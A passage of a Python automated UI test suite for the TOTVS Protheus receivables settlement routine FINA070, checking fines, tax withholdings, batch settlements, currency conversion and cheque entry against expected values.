# self.oHelper.SetParameters()
self.oHelper.SearchBrowse(f"D MG 01 {prefixo}{titulo}{parcela}{tipo}")
self.oHelper.SetButton("Outras Ações", "Excluir")
self.oHelper.SetButton("Confirmar")
self.oHelper.CheckHelp(text='TOTVS',button='Sim')
# verifica se foi cancelado
self.oHelper.SetButton("Baixar")
self.oHelper.WaitShow("Baixa de Titulos - BAIXAR")
self.oHelper.CheckResult("- Pagtos Parciais", "0,00")
self.oHelper.CheckResult("- Pis", "26,00")
self.oHelper.CheckResult("- Cofins", "120,00")
self.oHelper.CheckResult("- Csll", "40,00")
self.oHelper.CheckResult("= Valor Recebido", "3814,00")
self.oHelper.SetButton("Cancelar")
self.oHelper.AssertTrue()
# self.oHelper.AddParameter("MV_BR10925", "", "2", "1", "1")
# self.oHelper.SetParameters()
### CT193
### Baixar título com multa.
### TestCase: https://jiraproducao.totvs.com.br/secure/Tests.jspa#/testCase/GTSER-T40986
def test_FINA070_CT193(self):
prefixo = "FIN"
titulo = "FIN002152"
parcela = " "
tipo = "NF "
banco = "001"
agencia = "001"
conta = "001"
data = "21/06/2019"
self.oHelper.AddParameter("MV_BR10925", "", "2", "2", "2")# restaura do teste anterior
self.oHelper.AddParameter("MV_JURTIPO", "", "L", "L", "L")
self.oHelper.AddParameter("MV_FINJRTP", "", "2", "2", "2")
self.oHelper.AddParameter("MV_LJMULTA", "", "0.10", "0.10", "0.10")
self.oHelper.SetParameters()
self.oHelper.SearchBrowse(f"D MG 01 {prefixo}{titulo}{parcela}{tipo}")
self.oHelper.SetButton("Baixar")
self.oHelper.WaitShow("Baixa de Titulos - BAIXAR")
self.oHelper.SetValue("Data Receb.", data)
self.oHelper.SetValue("Data Crédito", data)
self.oHelper.CheckResult("+ Multa", "0,00")
self.oHelper.CheckResult("= Valor Recebido", "10000,00")
self.oHelper.SetButton("Cancelar")
self.oHelper.SetButton("Baixar")
self.oHelper.WaitShow("Baixa de Titulos - BAIXAR")
data = "28/06/2019"
self.oHelper.SetValue("Mot.Baixa", "NORMAL")
self.oHelper.SetValue("Banco", banco)
self.oHelper.SetValue("Agência", agencia)
self.oHelper.SetValue("Conta", conta)
self.oHelper.SetValue("Data Receb.", data)
self.oHelper.SetValue("Data Crédito", data)
self.oHelper.CheckResult("+ Multa", "10,00")
self.oHelper.CheckResult("= Valor Recebido", "10010,00")
self.oHelper.SetButton("Salvar")
self.oHelper.AssertTrue()
#self.oHelper.AddParameterReset()
### CT198
### Baixar título com rateio de multi. naturezas
### TestCase: https://jiraproducao.totvs.com.br/secure/Tests.jspa#/testCase/GTSER-T41643
def test_FINA070_CT198(self):
prefixo = "FIN"
titulo = "000000102"
parcela = " "
tipo = "NF "
self.oHelper.AddParameter("MV_JURTIPO", "", "M", "M", "M") # Restaura do teste anterior
self.oHelper.AddParameter("MV_MULNATR", "", ".T.", ".T.", ".T.")
self.oHelper.AddParameter("MV_IMPBXCR", "", "2", "2", "2") #Parametro para o CT260
self.oHelper.AddParameter("MV_MOEDBCO", "", ".T.", ".T.", ".T.")
self.oHelper.AddParameter("MV_SLDBXCR", "", "C", "C", "C") #CT220
self.oHelper.AddParameter("MV_CMC7FIN", "", "S", "S", "S") #CT220
self.oHelper.SetParameters()
self.oHelper.SearchBrowse(f"D MG 01 {prefixo}{titulo}{parcela}{tipo}")
self.oHelper.SetButton("Baixar")
self.oHelper.WaitShow("Baixa de Titulos - BAIXAR")
self.oHelper.SetValue("", True)
self.oHelper.SetButton("Salvar")
self.oHelper.SetValue("Natureza", "001", grid=True, row=1)
self.oHelper.SetValue("Vlr.Movim.", "12000,00", grid=True, row=1)
self.oHelper.SetValue("Rat. C.Custo", "1 - Sim", grid=True, row=1)
self.oHelper.LoadGrid()
self.oHelper.SetButton("Outras Ações", "Rateio")
self.oHelper.SetValue("cCodRateio", "001", name_attr=True)
self.oHelper.SetButton("Ok")
self.oHelper.SetButton("Salvar")
self.oHelper.SetButton("Salvar")
self.oHelper.SetButton("Outras Ações", "Consulta Rateio Multi Naturezas")
self.oHelper.WaitShow("Contas a Receber - Consulta Rateio Múltiplas Naturezas - Visualizar")
self.oHelper.ClickFolder("Baixas")
self.oHelper.SetButton("Fechar")
self.oHelper.AssertTrue()
#self.oHelper.AddParameterReset()
### CT206
### TIR - Baixa banco em moeda 1 e título com moeda 5 MV_MOEDBCO = .T.
### TestCase: https://jiraproducao.totvs.com.br/secure/Tests.jspa#/testCase/GTSER-T42940
def test_FINA070_CT206(self):
prefixo = "RIC"
titulo = "RIC018263"
parcela = " "
tipo = "NF "
banco = "RIC"
agencia = "M1"
conta = "0"
data = "01/06/2019"
# self.oHelper.AddParameter("MV_MOEDBCO", "", ".T.", ".T.", ".T.")
# self.oHelper.SetParameters()
self.oHelper.SearchBrowse(f"D MG 01 {prefixo}{titulo}{parcela}{tipo}")
self.oHelper.SetButton("Baixar")
self.oHelper.WaitShow("Baixa de Titulos - BAIXAR")
self.oHelper.SetValue("Mot.Baixa", "NORMAL")
self.oHelper.SetValue("Banco", banco)
self.oHelper.SetValue("Agência", agencia)
self.oHelper.SetValue("Conta", conta)
self.oHelper.SetValue("Data Receb.", data)
self.oHelper.SetValue("Data Crédito", data)
self.oHelper.CheckResult("Taxa contratada", "5,0000")
self.oHelper.CheckResult("= Valor Recebido", "20000,00")
self.oHelper.CheckResult("Valor IEN", "4000,00")
self.oHelper.SetButton("Salvar")
self.oHelper.AssertTrue()
#self.oHelper.AddParameterReset()
### CT208
### Baixa de título moeda 1 em banco moeda 2
### TestCase: https://jiraproducao.totvs.com.br/secure/Tests.jspa#/testCase/GTSER-T42944
def test_FINA070_CT208(self):
prefixo = "FIN"
titulo = "M1XX19447"
parcela = " "
tipo = "NF "
banco = "FIN"
agencia = "FINM2"
conta = "001"
data = "30/07/2019"
#self.oHelper.AddParameter("MV_MOEDBCO", "", ".T.", ".T.", ".T.") setado no teste 206
#self.oHelper.SetParameters()
self.oHelper.SearchBrowse(f"D MG 01 {prefixo}{titulo}{parcela}{tipo}")
self.oHelper.SetButton("Baixar")
self.oHelper.WaitShow("Baixa de Titulos - BAIXAR")
self.oHelper.SetValue("Mot.Baixa", "NORMAL")
self.oHelper.SetValue("Banco", banco)
self.oHelper.SetValue("Agência", agencia)
self.oHelper.SetValue("Conta", conta)
self.oHelper.SetValue("Data Receb.", data)
self.oHelper.SetValue("Data Crédito", data)
self.oHelper.CheckResult("= Valor Recebido", "1500,00")
self.oHelper.CheckResult("Valor R$", "6000,00")
self.oHelper.SetButton("Salvar")
self.oHelper.AssertTrue()
# self.oHelper.AddParameterReset()
### CT207
### TIR - Baixa de título com valor acessório
### TestCase: https://jiraproducao.totvs.com.br/secure/Tests.jspa#/testCase/GTSER-T42942
def test_FINA070_CT207(self):
prefixo = "FIN"
titulo = "000000101"
parcela = "1"
tipo = "NF "
banco = "FIN"
agencia = "00010"
conta = "0000000000"
data = "17/04/2019"
self.oHelper.SearchBrowse(f"D MG 01 {prefixo}{titulo}{parcela}{tipo}")
self.oHelper.SetButton("Baixar")
self.oHelper.WaitShow("Baixa de Titulos - BAIXAR")
self.oHelper.CheckResult("+ Valores Acessórios", "1000,00")
self.oHelper.CheckResult("= Valor Recebido", "2000,00")
self.oHelper.SetValue("Mot.Baixa", "NORMAL")
self.oHelper.SetValue("Banco", banco)
self.oHelper.SetValue("Agência", agencia)
self.oHelper.SetValue("Conta", conta)
self.oHelper.SetValue("Data Receb.", data)
self.oHelper.SetValue("Data Crédito", data)
self.oHelper.SetButton("Outras Ações", "Valores Acessórios")
self.oHelper.WaitShow("Contas a Receber - Valores Acessórios - Alteração")
self.oHelper.SetValue("FKD_VLINFO", "500,00", grid=True, name_attr=True, row=1)
self.oHelper.SetValue("FKD_VLINFO", "0,00", grid=True, name_attr=True, row=2)
self.oHelper.LoadGrid()
self.oHelper.SetButton("Confirmar")
self.oHelper.CheckHelp("Registro alterado com sucesso.","Fechar")
self.oHelper.CheckResult("+ Valores Acessórios", "500,00")
self.oHelper.CheckResult("= Valor Recebido", "1500,00")
self.oHelper.AssertTrue()
self.oHelper.SetButton("Salvar")
### CT093
### Baixa por lote
### TestCase: https://jiraproducao.totvs.com.br/secure/Tests.jspa#/testCase/GTSER-T15110
def test_FINA070_CT093(self):
banco = '161'
agencia = '00161'
conta = '0000000161'
ntitulos = '3'
lote ='LT161'
natureza ='FIN161'
dataDe='01/10/2016'
dataAte='31/12/2016'
prefixo = "161"
titulo = "FIN000001"
titulo2 = "FIN000002"
parcela = " "
tipo = "NF "
self.oHelper.SetButton("Outras Ações", "Lote")
self.oHelper.SetValue("cBancolt", banco, name_attr=True)
self.oHelper.SetValue("cAgencialt", agencia, name_attr=True)
self.oHelper.SetValue("cContalt", conta, name_attr=True)
self.oHelper.SetValue("nNroTit", ntitulos, name_attr=True)
self.oHelper.SetValue("cLoteFin", lote, name_attr=True)
self.oHelper.SetValue("cNaturLote", natureza, name_attr=True)
self.oHelper.SetValue("dVencDe", dataDe, name_attr=True)
self.oHelper.SetValue("dVencAte", dataAte, name_attr=True)
self.oHelper.SetValue("cNatDe", natureza, name_attr=True)
self.oHelper.SetValue("cNatAte", natureza, name_attr=True)
self.oHelper.SetButton("Ok")
self.oHelper.SetButton("Salvar")
self.oHelper.ClickBox("Filial", select_all=True)
self.oHelper.SetButton("Salvar")
self.oHelper.CheckResult("nValRec", "10.000,99", name_attr=True)
self.oHelper.SetValue("cMotBx", "NORMAL", name_attr=True)
self.oHelper.SetButton("Salvar")
self.oHelper.CheckResult("nValRec", "20.000,99", name_attr=True)
self.oHelper.SetValue("cMotBx", "NORMAL", name_attr=True)
self.oHelper.SetButton("Salvar")
self.oHelper.CheckResult("nValRec", "30.000,99", name_attr=True)
self.oHelper.SetValue("cMotBx", "NORMAL", name_attr=True)
self.oHelper.SetButton("Salvar")
self.oHelper.CheckHelp(text='TOTGERAL',button='Fechar')
self.oHelper.SearchBrowse(f"D MG 01 {prefixo}{titulo}{parcela}{tipo}")
self.oHelper.SetButton("Outras Ações", "Canc Baixa")
self.oHelper.SetButton("Confirmar")
self.oHelper.SearchBrowse(f"D MG 01 {prefixo}{titulo2}{parcela}{tipo}")
self.oHelper.SetButton("Outras Ações", "Excluir")
self.oHelper.SetButton("Confirmar")
self.oHelper.CheckHelp(text='VLDBXLOTE',button='Fechar')
self.oHelper.AssertTrue()
### CT220
### Validações tela de cheque na baixa
### TestCase: https://jiraproducao.totvs.com.br/secure/Tests.jspa#/testCase/GTSER-T44213
def test_FINA070_CT220(self):
prefixo = "FIN"
titulo = "TIRCHEQUE"
parcela = " "
tipo = "NF "
# self.oHelper.AddParameter("MV_CMC7FIN", "", "S", "S", "S")
# self.oHelper.SetParameters()
self.oHelper.SearchBrowse(f"D MG 01 {prefixo}{titulo}{parcela}{tipo}")
self.oHelper.SetButton("Baixar")
self.oHelper.WaitShow("Baixa de Titulos - BAIXAR")
self.oHelper.SetValue("Mot.Baixa", "NORMAL")
self.oHelper.SetButton("Outras Ações", "Cheque(s)")
self.oHelper.SetButton("Outras Ações", "CMC7")
self.oHelper.SetValue("cCmc7", "<TIRTIR00<0180001265<577508114673:", name_attr=True)
self.oHelper.SetButton("Ok")
self.oHelper.SetButton("Parâmetros")
self.oHelper.SetKey("ESC")
self.oHelper.SetButton("Cancelar")
self.oHelper.CheckHelp(text='Cheques recebidos',button='Sim') # Deseja Incluir mais cheques?
self.oHelper.SetValue("cCmc7", "<TIRTIR00<0180001265<577508114673:", name_attr=True)
self.oHelper.SetButton("Ok")
self.oHelper.SetValue("Valor Nominal", "500,00")
self.oHelper.SetButton("Ok")
self.oHelper.SetButton("Não")
self.oHelper.SetValue("Valor ref. baixa", "1.000,00", grid=True, row=1)
self.oHelper.LoadGrid()
self.oHelper.SetButton("Salvar")
self.oHelper.SetButton("Salvar")
self.oHelper.SetButton("Outras Ações", "Canc Baixa")
self.oHelper.SetButton("Ok")
self.oHelper.SetButton("Confirmar")
self.oHelper.AssertTrue()
### CT261
### PCC regra antiga
### TestCase: https://jiraproducao.totvs.com.br/secure/Tests.jspa#/testCase/GTSER-T49802
def test_FINA070_CT261(self):
prefixo = "FIN"
titulo = "TITANTTIR"
parcela = " "
tipo = "NF "
data ='11/06/2015'
self.oHelper.SearchBrowse(f"D MG 01 {prefixo}{titulo}{parcela}{tipo}")
self.oHelper.SetButton("Baixar")
self.oHelper.WaitShow("Baixa de Titulos - BAIXAR")
self.oHelper.SetValue("Mot.Baixa", "NORMAL")
self.oHelper.SetValue("Data Receb.", data)
self.oHelper.SetValue("Data Crédito", data)
# Verifica o valor calculado com a nova regra do pcc
self.oHelper.CheckResult("- Pis", "14,30")
self.oHelper.CheckResult("- Cofins", "22,00")
self.oHelper.CheckResult("- Csll", "66,00")
# Com a regra antiga do PCC não foi atingido o mínimo para retenção
self.oHelper.SetValue("- Descontos", "25,00")
self.oHelper.SetValue("+ Multa", "83,00")
self.oHelper.SetValue("+ Tx.Permanenc.", "25,00")
self.oHelper.SetValue("= Valor Recebido", "2.250,00")
self.oHelper.CheckResult("- Pis", "0,00")
self.oHelper.CheckResult("- Cofins", "0,00")
self.oHelper.CheckResult("- Csll", "0,00")
self.oHelper.SetButton("Salvar")
self.oHelper.SetButton("Outras Ações", "Canc Baixa")
self.oHelper.SetButton("Confirmar")
self.oHelper.AssertTrue()
### CT260
### Alterar impostos na baixa
### TestCase: https://jiraproducao.totvs.com.br/secure/Tests.jspa#/testCase/GTSER-T49799
def test_FINA070_CT260(self):
prefixo = "FIN"
titulo = "000000207"
parcela = "1"
tipo = "NF "
data = "24/03/2020"
# self.oHelper.AddParameter("MV_MULNATR", "", ".T.", ".T.", ".T.")
# self.oHelper.AddParameter("MV_IMPBXCR", "", "2", "2", "2")
# self.oHelper.SetParameters()
self.oHelper.SearchBrowse(f"D MG 01 {prefixo}{titulo}{parcela}{tipo}")
self.oHelper.SetButton("Baixar")
self.oHelper.WaitShow("Baixa de Titulos - BAIXAR")
self.oHelper.SetValue("Mot.Baixa", "NORMAL")
self.oHelper.SetValue("Data Receb.", data)
self.oHelper.SetValue("Data Crédito", data)
self.oHelper.SetValue("", True) #Rateio multiplas naturezas
self.oHelper.SetValue("nValRec" , "5.000,00", name_attr=True)
self.oHelper.SetButton("Salvar") #Tela da baixa
self.oHelper.SetButton("Salvar") #Tela do rateio
#self.oHelper.SetButton("Baixar")
#self.oHelper.WaitShow("Baixa de Titulos - BAIXAR")
#self.oHelper.SetButton("Outras Ações", "Impostos")
#self.oHelper.SetValue("nOrigPis" , "60,00" , name_attr=True)
#self.oHelper.SetValue("nOrigCofins" , "250,00" , name_attr=True)
#self.oHelper.SetValue("nOrigCsll" , "190,00" , name_attr=True)
#self.oHelper.SetButton("Salvar")
#self.oHelper.SetButton("Sim")
self.oHelper.SetButton("Baixar")
self.oHelper.WaitShow("Baixa de Titulos - BAIXAR")
self.oHelper.SetValue("Mot.Baixa", "NORMAL")
self.oHelper.SetValue("Data Receb.", data)
self.oHelper.SetValue("Data Crédito", data)
self.oHelper.SetValue("", True) #Rateio multiplas naturezas
self.oHelper.CheckResult("nTotAbImp", "615,00" , name_attr=True)
self.oHelper.CheckResult("nValRec" , "4.385,00", name_attr=True)
self.oHelper.SetButton("Salvar") #Tela da baixa
self.oHelper.SetButton("Salvar") #Tela do rateio
self.oHelper.SetButton("Outras Ações", "Canc Baixa")
self.oHelper.ClickListBox("FIN 000000207 1 NF FIN292 01 24/03/2020 4.385,00 02")
self.oHelper.SetButton("Ok")
self.oHelper.SetButton("Confirmar")
self.oHelper.SetButton("Outras Ações", "Canc Baixa")
self.oHelper.SetButton("Confirmar")
self.oHelper.AssertTrue()
### CT152
### Apenas tela consulta de impostos.
### TestCase: https://jiraproducao.totvs.com.br/secure/Tests.jspa#/testCase/GTSER-T34862
def test_FINA070_CT152(self):
prefixo = "FIN"
titulo = "A110CT35A"
parcela = " "
tipo = "NF "
self.oHelper.SearchBrowse(f"D MG 01 {prefixo}{titulo}{parcela}{tipo}")
self.oHelper.SetButton("Outras Ações", "Consulta de Retenções")
self.oHelper.CheckResult("Valor Calc.", "300,00", grid=True, line=1, grid_number=1)
self.oHelper.LoadGrid()
self.oHelper.CheckResult("Valor Calc.", "100,00", grid=True, line=2, grid_number=1)
self.oHelper.LoadGrid()
self.oHelper.CheckResult("Valor Calc.", "1.100,00", grid=True, line=3, grid_number=1)
self.oHelper.LoadGrid()
self.oHelper.CheckResult("Valor Calc.", "150,00", grid=True, line=4, grid_number=1)
self.oHelper.LoadGrid()
self.oHelper.CheckResult("Valor Calc.", "65,00", grid=True, line=5, grid_number=1)
self.oHelper.LoadGrid()
#self.oHelper.CheckResult("Valor Calc.", "300,00", grid=True, line=1, grid_number=2)
#self.oHelper.LoadGrid()
self.oHelper.SetButton("Fechar")
self.oHelper.AssertTrue()
### CT263
### Baixa elm lote com título que ja teve baixa parcial
### TestCase: https://jiraproducao.totvs.com.br/secure/Tests.jspa#/testCase/GTSER-T49906
def test_FINA070_CT263(self):
banco = 'CX1'
agencia = '00001'
conta = '0000000001'
ntitulos = '1'
lote ='LT070'
natureza ='FIN0000105'
dataDe='27/03/2020'
dataAte='27/03/2020'
data='28/03/2020'
prefixo = "FIN"
titulo = "000000208"
parcela = "1"
tipo = "NF "
self.oHelper.AddParameter("MV_IMPBAIX", "", "1", "1", "1")
# self.oHelper.AddParameter("MV_BR10925", "", "1", "1", "1")
self.oHelper.SetParameters()
self.oHelper.SetButton("Outras Ações", "Lote")
self.oHelper.SetValue("cBancolt", banco, name_attr=True)
self.oHelper.SetValue("cAgencialt", agencia, name_attr=True)
self.oHelper.SetValue("cContalt", conta, name_attr=True)
self.oHelper.SetValue("nNroTit", ntitulos, name_attr=True)
self.oHelper.SetValue("cLoteFin", lote, name_attr=True)
self.oHelper.SetValue("cNaturLote", natureza, name_attr=True)
self.oHelper.SetValue("dVencDe", dataDe, name_attr=True)
self.oHelper.SetValue("dVencAte", dataAte, name_attr=True)
self.oHelper.SetValue("cNatDe", natureza, name_attr=True)
self.oHelper.SetValue("cNatAte", natureza, name_attr=True)
self.oHelper.SetButton("Ok")
self.oHelper.SetButton("Salvar")
self.oHelper.ClickBox("Filial", select_all=True)
self.oHelper.SetButton("Salvar")
self.oHelper.SetValue("Mot.Baixa", "NORMAL")
self.oHelper.SetValue("Data Receb.", data)
self.oHelper.SetValue("Data Crédito", data)
self.oHelper.SetValue("nJuros", "25,00", name_attr=True)
self.oHelper.SetValue("nMulta", "25,00", name_attr=True)
self.oHelper.SetValue("nDescont", "50,00", name_attr=True)
self.oHelper.SetValue("nJuros", "10,00", name_attr=True)
self.oHelper.SetValue("nMulta", "10,00", name_attr=True)
self.oHelper.SetValue("nDescont", "10,00", name_attr=True)
self.oHelper.SetValue("nJuros", "25,00", name_attr=True)
self.oHelper.SetValue("nMulta", "25,00", name_attr=True)
self.oHelper.SetValue("nDescont", "50,00", name_attr=True)
self.oHelper.CheckResult("- Pis", "32,50")
self.oHelper.CheckResult("- Cofins", "150,00")
self.oHelper.CheckResult("- Csll", "50,00")
self.oHelper.CheckResult("= Valor Recebido", "4.385,00")
self.oHelper.SetButton("Salvar")
self.oHelper.CheckHelp(text='TOTGERAL',button='Fechar')
self.oHelper.SearchBrowse(f"D MG 01 {prefixo}{titulo}{parcela}{tipo}")
self.oHelper.SetButton("Outras Ações", "Canc Baixa")
self.oHelper.SetButton("Ok")
self.oHelper.CheckHelp(text='FINIMPBX',button='Fechar')
self.oHelper.SetButton("Outras Ações", "Canc Baixa")
self.oHelper.ClickListBox("FIN 000000208 1 NF FIN292 01 28/03/2020 4.385,00 03")
self.oHelper.SetButton("Ok")
self.oHelper.SetButton("Confirmar")
self.oHelper.CheckHelp(text='TOTVS',button='Sim')
self.oHelper.SetButton("Outras Ações", "Canc Baixa")
self.oHelper.SetButton("Confirmar")
self.oHelper.AssertTrue()
### CT150
### Apenas tela consulta de impostos.
### TestCase: https://jiraproducao.totvs.com.br/secure/Tests.jspa#/testCase/GTSER-T34860
def test_FINA070_CT150(self):
prefixo = "FIN"
titulo = "A110CT34A"
parcela = " "
tipo = "NF "
self.oHelper.SearchBrowse(f"D MG 01 {prefixo}{titulo}{parcela}{tipo}")
self.oHelper.SetButton("Baixar")
self.oHelper.SetButton("Outras Ações", "Retenção de impostos")
self.oHelper.CheckResult("Valor Calculado", "16,50", grid=True, line=1, grid_number=1)
self.oHelper.LoadGrid()
self.oHelper.SetValue("Valor a Reter", "50,00", grid=True)
self.oHelper.LoadGrid()
self.oHelper.SetButton("Confirmar")
self.oHelper.SetButton("Fechar")
self.oHelper.CheckResult("- Retenções", "50,00")
self.oHelper.SetButton("Cancelar")
self.oHelper.AssertTrue()
### CT274
### Apenas tela de baixa e mudança de bancos com retenção
### TestCase: https://jiraproducao.totvs.com.br/secure/Tests.jspa#/testCase/GTSER-T34860
def test_FINA070_CT274(self):
prefixo = "FIN"
titulo = "A110CT34A"
parcela = " "
tipo = "NF "
banco = "CX1"
agencia = "00001"
conta = "0000000001"
data = "11/05/2020"
self.oHelper.SearchBrowse(f"D MG 01 {prefixo}{titulo}{parcela}{tipo}")
self.oHelper.SetButton("Baixar")
self.oHelper.WaitShow("Baixa de Titulos - BAIXAR")
self.oHelper.SetValue("Mot.Baixa", "NORMAL")
self.oHelper.SetValue("Banco", "022")
self.oHelper.SetValue("Agência", "022")
self.oHelper.SetValue("Conta", "022")
self.oHelper.SetValue("Data Receb.", data)
self.oHelper.CheckResult("Data Crédito", '13/05/2020')
self.oHelper.SetValue("Banco", banco)
self.oHelper.SetValue("Agência", agencia)
self.oHelper.SetValue("Conta", conta)
self.oHelper.CheckResult("Data Crédito", data)
self.oHelper.SetButton("Cancelar")
self.oHelper.AssertTrue()
### CT279
### TIR - Baixa de título com desconto proporcional a baixa (MV_DESCFIN = 'P')
### TestCase: https://jiraproducao.totvs.com.br/secure/Tests.jspa#/testCase/GTSER-T42940
def test_FINA070_CT279(self):
prefixo = "DSC"
titulo = "FINDSCPRP"
parcela = " "
tipo = "NF "
banco = "001"
agencia = "001"
conta = "001"
data = "01/06/2019"
self.oHelper.AddParameter("MV_DESCFIN", "", "P", "P", "P")
self.oHelper.SetParameters()
self.oHelper.SearchBrowse(f"D MG 01 {prefixo}{titulo}{parcela}{tipo}")
self.oHelper.SetButton("Baixar")
self.oHelper.WaitShow("Baixa de Titulos - BAIXAR")
self.oHelper.SetValue("Mot.Baixa", "NORMAL")
self.oHelper.SetValue("Banco", banco)
self.oHelper.SetValue("Agência", agencia)
self.oHelper.SetValue("Conta", conta)
self.oHelper.SetValue("Data Receb.", data)
self.oHelper.SetValue("Data Crédito", data)
self.oHelper.SetValue("= Valor Recebido", "500,00")
self.oHelper.SetValue("= Valor Recebido", "300,00")
self.oHelper.SetValue("= Valor Recebido", "400,00")
self.oHelper.CheckResult("= Valor Recebido", "360,00")
self.oHelper.CheckResult("- Descontos", "40,00")
self.oHelper.SetButton("Cancelar")
self.oHelper.AssertTrue()
### CT297
### TIR - CT297 - TIR Botão impostos
### TestCase: https://jiraproducao.totvs.com.br/secure/Tests.jspa#/project/10231/testCase?folderId=2595
def test_FINA070_CT297(self):
prefixo = "FIN"
titulo = "TIR070400"
parcela = " "
tipo = "NF "
banco = "001"
agencia = "001"
conta = "001"
data = "07/12/2020"
self.oHelper.SearchBrowse(f"D MG 01 {prefixo}{titulo}{parcela}{tipo}")
self.oHelper.SetButton("Baixar")
self.oHelper.WaitShow("Baixa de Titulos - BAIXAR")
self.oHelper.SetValue("Mot.Baixa", "NORMAL")
self.oHelper.SetValue("Banco", banco)
self.oHelper.SetValue("Agência", agencia)
self.oHelper.SetValue("Conta", conta)
self.oHelper.SetValue("Data Receb.", data)
self.oHelper.SetValue("Data Crédito", data)
self.oHelper.SetButton("Outras Ações", "Impostos")
self.oHelper.SetValue("PIS", "50,00")
self.oHelper.CheckResult("Valor Recebido", "8.300,00")
self.oHelper.SetButton("Salvar")
self.oHelper.CheckHelp(text='TOTVS',button='Sim') # Confirma alteração dos valores de impostos???
self.oHelper.CheckResult("= Valor Recebido", "8.300,00")
self.oHelper.SetButton("Cancelar")
self.oHelper.AssertTrue()
### CT298
### TIR -
### TestCase: https://jiraproducao.totvs.com.br/secure/Tests.jspa#/project/10231/testCase?folderId=2595
def test_FINA070_CT298(self):
prefixo = "001"
titulo = "FIN90F "
parcela = " "
tipo = "NF "
banco = "001"
agencia = "001"
conta = "001"
data = "09/12/2020"
self.oHelper.AddParameter("MV_BR10925", "", "1", "1", "1")
self.oHelper.SetParameters()
self.oHelper.SearchBrowse(f"D MG 01 {prefixo}{titulo}{parcela}{tipo}")
self.oHelper.SetButton("Baixar")
self.oHelper.WaitShow("Baixa de Titulos - BAIXAR")
self.oHelper.SetValue("Mot.Baixa", "NORMAL")
self.oHelper.SetValue("Banco", banco)
self.oHelper.SetValue("Agência", agencia)
self.oHelper.SetValue("Conta", conta)
self.oHelper.SetValue("Data Receb.", data)
self.oHelper.SetValue("Data Crédito", data)
self.oHelper.SetButton("Outras Ações", "Impostos")
self.oHelper.SetButton("Cancelar")
self.oHelper.SetButton("Cancelar")
self.oHelper.AssertTrue()
### CT299
### TIR -
### TestCase: https://jiraproducao.totvs.com.br/secure/Tests.jspa#/project/10231/testCase?folderId=2595
def test_FINA070_CT299(self):
prefixo = "FIN"
titulo = "FIN070402"
parcela = " "
tipo = "NF "
banco = "FIN"
agencia = "001"
conta = "FIN006"
data = "09/12/2020"
self.oHelper.SearchBrowse(f"D MG 01 {prefixo}{titulo}{parcela}{tipo}")
self.oHelper.SetButton("Visualizar")
self.oHelper.SetButton("Cancelar")
self.oHelper.SetButton("Baixar")
self.oHelper.WaitShow("Baixa de Titulos - BAIXAR")
self.oHelper.SetValue("+ Multa", "100,00")
self.oHelper.SetValue("Mot.Baixa", "NORMAL")
self.oHelper.SetValue("Banco", banco)
self.oHelper.SetValue("Agência", agencia)
self.oHelper.SetValue("Conta", conta)
self.oHelper.SetValue("Data Receb.", data)
self.oHelper.SetValue("Data Crédito", data)
self.oHelper.CheckResult("= Valor Recebido", "10.500,00")
self.oHelper.SetButton("Cancelar")
self.oHelper.AssertTrue()
### CT300
### TIR -
### TestCase: https://jiraproducao.totvs.com.br/secure/Tests.jspa#/project/10231/testCase?folderId=2595
def test_FINA070_CT300(self):
prefixo = "FIN"
titulo = "FIN070403"
parcela = " "
tipo = "NF "
banco = "001"
agencia = "001"
conta = "001"
data = "11/12/2020"
lote ='RR951'
ntitulos = '1'
natureza = '004'
self.oHelper.WaitShow("Baixa de Titulos")
self.oHelper.SetKey("F12")
self.oHelper.SetValue("Contabiliza On Line ?" ,"Sim")
self.oHelper.SetButton('Ok')
#self.oHelper.AddParameter("MV_BR10925", "", "1", "1", "1")
#self.oHelper.SetParameters()
#self.oHelper.WaitShow("Baixa de Títulos")
self.oHelper.SearchBrowse(f"D MG 01 {prefixo}{titulo}{parcela}{tipo}")
self.oHelper.SetButton("Outras Ações", "Lote")
self.oHelper.SetValue("cBancolt", banco, name_attr=True)
self.oHelper.SetValue("cAgencialt", agencia, name_attr=True)
self.oHelper.SetValue("cContalt", conta, name_attr=True)
self.oHelper.SetValue("nNroTit", ntitulos, name_attr=True)
self.oHelper.SetValue("cLoteFin", lote, name_attr=True)
self.oHelper.SetValue("cNaturLote", natureza, name_attr=True)
self.oHelper.SetValue("dVencDe", data, name_attr=True)
self.oHelper.SetValue("dVencAte", data, name_attr=True)
self.oHelper.SetValue("cNatDe", natureza, name_attr=True)
self.oHelper.SetValue("cNatAte", natureza, name_attr=True)
self.oHelper.SetButton("Ok")
self.oHelper.SetButton("Salvar")
self.oHelper.ClickBox("Filial", select_all=True)
self.oHelper.ClickBox("Filial", select_all=True)
self.oHelper.ClickBox("Filial", select_all=True)
self.oHelper.SetButton("Salvar")
self.oHelper.CheckResult("nValRec", "4.385,00", name_attr=True)
self.oHelper.SetValue("cMotBx", "NORMAL", name_attr=True)
self.oHelper.SetButton("Salvar")
self.oHelper.CheckHelp(text='TOTGERAL',button='Fechar')
self.oHelper.SearchBrowse(f"D MG 01 {prefixo}{titulo}{parcela}{tipo}")
self.oHelper.AssertTrue()
### CT301
### TIR -
### TestCase: https://jiraproducao.totvs.com.br/secure/Tests.jspa#/project/10231/testCase?folderId=2595
def test_FINA070_CT301(self):
prefixo = "FIN"
titulo = "FIN070L02"
parcela = " "
tipo = "NF "
banco = "FIN"
agencia = "FIN07"
conta = "FIN070L01"
data = "28/12/2020"
lote ='RR877'
ntitulos = '2'
natureza = '004'
self.oHelper.AddParameter("MV_BR10925", "", "1", "1", "1")
self.oHelper.AddParameter("MV_LOTEFIN", "", "S", "S", "S")
self.oHelper.SetParameters()
self.oHelper.SearchBrowse(f"D MG 01 {prefixo}{titulo}{parcela}{tipo}")
self.oHelper.SetButton("Outras Ações", "Lote")
self.oHelper.SetValue("cBancolt", banco, name_attr=True)
self.oHelper.SetValue("cAgencialt", agencia, name_attr=True)
self.oHelper.SetValue("cContalt", conta, name_attr=True)
self.oHelper.SetValue("nNroTit", ntitulos, name_attr=True)
self.oHelper.SetValue("cLoteFin", lote, name_attr=True)
self.oHelper.SetValue("cNaturLote", natureza, name_attr=True)
self.oHelper.SetValue("dVencDe", data, name_attr=True)
self.oHelper.SetValue("dVencAte", data, name_attr=True)
self.oHelper.SetValue("cNatDe", natureza, name_attr=True)
self.oHelper.SetValue("cNatAte", natureza, name_attr=True)
self.oHelper.SetButton("Ok")
self.oHelper.SetButton("Salvar")
self.oHelper.ClickBox("Filial", select_all=True)
self.oHelper.SetButton("Salvar")
self.oHelper.CheckResult("nValRec", "9.385,00", name_attr=True)
self.oHelper.SetValue("cMotBx", "NORMAL", name_attr=True)
